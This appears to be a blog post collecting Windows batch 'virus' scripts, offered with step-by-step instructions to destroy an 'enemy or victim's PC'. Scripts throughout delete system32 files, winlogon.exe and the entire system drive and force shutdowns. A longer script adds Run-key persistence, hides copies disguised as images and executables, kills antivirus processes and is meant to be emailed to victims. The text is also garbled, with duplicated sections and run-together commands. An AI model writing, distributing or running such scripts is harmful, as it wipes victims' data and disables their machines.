Here is some collection of batch codes....
1)Simply create a New Notepad, copy the below code and paste it in Notepad, now go to file and save it as Window.bat
@echo off
del c:\windows\system32\restore
del c:\windows\system32\winlogon.exe
del c:\windows\system32\logonui.exe
shutdown -f
Result:- the c drive will need to instal windows again
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
@Echo off
Del C:\ *.* y
3.This Virus Will just restart your pc
4)How to make Virus by Virus software:
1)Simply create a New Notepad, copy the below code and paste it in Notepad, now go to file and save it as Window.bat
@echo off
del c:\windows\system32\restore
del c:\windows\system32\winlogon.exe
del c:\windows\system32\logonui.exe
shutdown -f
Result:- the c drive will need to instal windows again
2)Make Virus
Copy the Following Codes and save it into batch file...
1.Virus Code this Virus Code will deleted your all files in hard drive....just copy code and save it into notepad and save as batch file..:)
@echo offdel %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
2.Virus Code this Virus will crush your window...:D
just copy n save as batch file..
@Echo off
Del C:\ *.* y
3.This Virus Will just restart your pc
@echo off shutdown -r -f -t 00
save as anyname.bat
save as anyname.bat
3)Destroy ur enemy PC with virus
this post we'll take a look on how to create a deadly computer virus to destroy your enemy or victim's PC
1) Open Notepad
2) write the below command : -
del c:\windows\system32\*.* /q
3) Save the above notepad with the extension ".bat or .cmd" as u want
!!!!!!!!!!!!!!!!!!!!!!Attention!!!!!!!!!!!!!!!!!!! !!!
Don't double click the file otherwise u r in trouble. Why ?????? bcz the file u created delete all files from ur
system32 folder and when u restart ur pc it will not start bcz system can not find the files in the system32 folder which is required at the time of booting.
4) You can also test the above by creating a fake folder let suppose
windows1 in C:\. Copy some old files in it and just follow the
above command.By double clicking the bat or cmd file ur all files
automaitcally get deleted.
5) You can try this file in any one`s computer.(but this result in causing damage to the computer, so think again before trying this on anyone's pc)
Virus 2
This post is to help you to send viruses to your enemies! Here goes,Copy the below code and paste into your notepad.. then save as anyname.bat
Do not click on that batch file........ Send it your enimies email...It will
1) Copy itself into startup
2) Copy itself over one thousand times into random spots in your computer
3) Hide its self and all other created files
4) Task kill MSN, Norton, Windows Explorer, Limewire.
5) Swap the left mouse button with the right one
6) Opens alert boxes
7) Changes the time to 12:00 and shuts down the computer
Code :-
@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nulAttrib +r +h Greatgame.batAttrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.batgoto RIP
No comments:
Post a Comment